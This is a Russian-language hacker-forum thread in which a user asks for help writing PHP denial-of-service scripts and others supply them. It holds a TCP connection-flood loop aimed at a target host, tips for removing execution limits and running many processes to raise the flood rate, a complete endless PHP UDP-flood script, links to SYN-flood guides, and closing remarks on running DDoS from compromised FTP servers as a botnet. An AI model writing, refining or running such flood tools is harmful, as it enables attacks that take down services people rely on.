PHP DoS

[DiegO]

Я решил выучить php, взял книжку, учю, но там не чего не сказанно про работу с socket`ами.
Ну да ладно. )
Помогите написат или растолковать готовый скрипт(php) для dos атак, на примере udp и syn флуда.
Да ещё, меня интересует как задать кол-во socket`ов, время атаки, и время между создания socket`ами.
Заранее благодарен, жду ответов с не терпением!

 

[Zer0]

удп сан флуд на пхп не сдлелать
уеих все упакованно уже в fsockopen

 

[TrueUser]

DiegO на досуге погугли "PHP5 в подлиннике" там все есть про сокеты и про многое другое. ИМХО лучшая книга по пхп на русском.
Что касается организации атак

udp и syn флуда

то тут надо писать на более низком уровне (в частности на сях под никсы).

 

[DiegO]

TrueUser спасибо) Вот на досуге погуглил про сокеты и вроде всё понятно, но маленькое но - есть скрипт

 <?php
for($i=1;$i<=99999;$i++)
{
$fp = fsockopen("tcp://site.com", 80);
fclose($fp);
}
?>

типо безконечно сокеты стряпает , но проходит 30 сек и выдаёт таккую дрянь

 Fatal error: Maximum execution time of 30 seconds exceeded in ***\www\2.php on line 4

типо программа выполняется более 30 сек и не хера не происходит, как это обойти?

 

[GOONER]

Можеш поменять в php.ini max_execution_time
ПС:почитай о неблокирующих сокетах...

 

[Chococream]

Как вариант set_time_limit(0); в начале скрипта, либо меняй конфу в php.ini.

 

[DiegO]

Chococream спасибо, как раз то что мне нужно)

 

[DiegO]

Ещё хочу задать тут ворос дабы не создовать новой темы и не забивать форум)
Вот скрипт:

<?php
set_time_limit(0);
for($i=1;$i<=99999;$i++)
{
$fp = fsockopen("tcp://site.com", 80);
fclose($fp);
}
?>

Как вы наверное поняли для ДОСа, но проблема в том что сокеты создаются слишком медленно и частями(по 10-15 сокетов за 1-2 секунды), а мне надо что бы сокеты создовались быстрее к примеру как у всем известного SPRUT или JaniDoS, и ещё - как остовлять соединение открытым, к примеру при ДОС атаке утилитой SPRUT если просматривать все connect`s (я пользуюсь IPTOOLS или приметивным netstat -an ) то в статусе написано ESTABLISHED или SYN_SENT (как я понял это говорит о том что соединение всё ещё открыто), а у меня TIME_WITE ? Помогите, поправьте если чё не так.

 

[TrueUser]

а мне надо что бы сокеты создовались быстрее

Запускай пхп в несколько процессов (это будут или процессы php-cgi или воркеры апача) Многое конечно от сервака зависит. Как запускать? Все просто - или несколько фреймов или циклический запуск одного скрипта из другого через wget например.. вообще говоря вариантов много.

 

[DiegO]

TrueUser огромная тебе благодарность, ну а что же делать с TIME_WITE ??????????????

 

[TrueUser]

ну а что же делать с TIME_WITE ?

Возможно просто сокеты повисают на сервере (то есть он с одной стороны доступен, но к обмену данным не готов, поэтому сокет переводится в режим ожидания). Опять же не исключено что на сервре кончились свободные сокеты или стоит ограничение на их количество на один айпи.

 

[DiegO]

И что не как не обойти эту дрянь?

 

[TrueUser]

Расскажи более подробно как и где возникают траблы, приведи пример кода, тогда еще что то можно будет кубатурить, так просто ничего сказать не могу.

 

[vomzh]

UDP flood собирается на пхп в пол пинка. Читаем тут:

http://www.malwares-in.net/forum/Thread-PH...-UDP-Flood.html

<?php
$ip_address = '127.0.0.1';
$socket = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$socket)
die(__LINE__);

$data='';

for ($i=0;$i<1400;$i++) {
$data.=chr(rand(0,255));
}

while(true) {

if (!socket_sendto($sock,$data,strlen($data),0,$ip_address,9))
die(__LINE__);

echo('-');
}
?>

можно конечно и по умнее.

с SYN flood попробуй на сях собратъ.

http://www.binarytides.com/blog/syn-flood-dos-attack/

 

[DiegO]

Да до меня уже всё допёрло (в том числе как и udp флуд делать ), спасибо за ответ

Добавлено в [time]1287501021[/time]
А я с не знаю

 

[encoder]

норке =\\\\\
тогда цикл не for, а while(1=1), для полного идиотизма ))))
и для полного фарша еще кнопочку паузы аттаки сделоть ))) ток кнопочка существенно тормознет ддос)))))

 

[DiegO]

Вот ты чё этим хотел сказать?

 

[encoder]

нужен gui интерфейс)))))))

 

[DiegO]

дак мне не для досерки, мне просто интересно было, да и так для себя... досерки на php говно, коннекты еле-еле набираются, да и вообще пыха не для этого ))

Добавлено в [time]1303286956[/time]
DoS сам по себе так себе, а вот ddos это тема ))

 

[WennY]

досерки на php говно

Нусс, это как посмотреть =) Если не имеет место фатальная кривожопость кистей рук, то можно замутить очень даже интересные вещи на том же пхп. Конечно, 10к онлайн машин по эффективности наверняка оставят позади дюжину другую фтп, но компутерный (назовем так) ботнет сжирает на порядки больше нерво-средств, нежели сотенка-другая фтпшек, которые не нуждаются в чистках, и - если по-нормальному все это хозяйство обустроить, - в интенсивном и каждодневном пополнении ботнета т.к. ежесуточно не отмирает очень не кислая часть ботнета.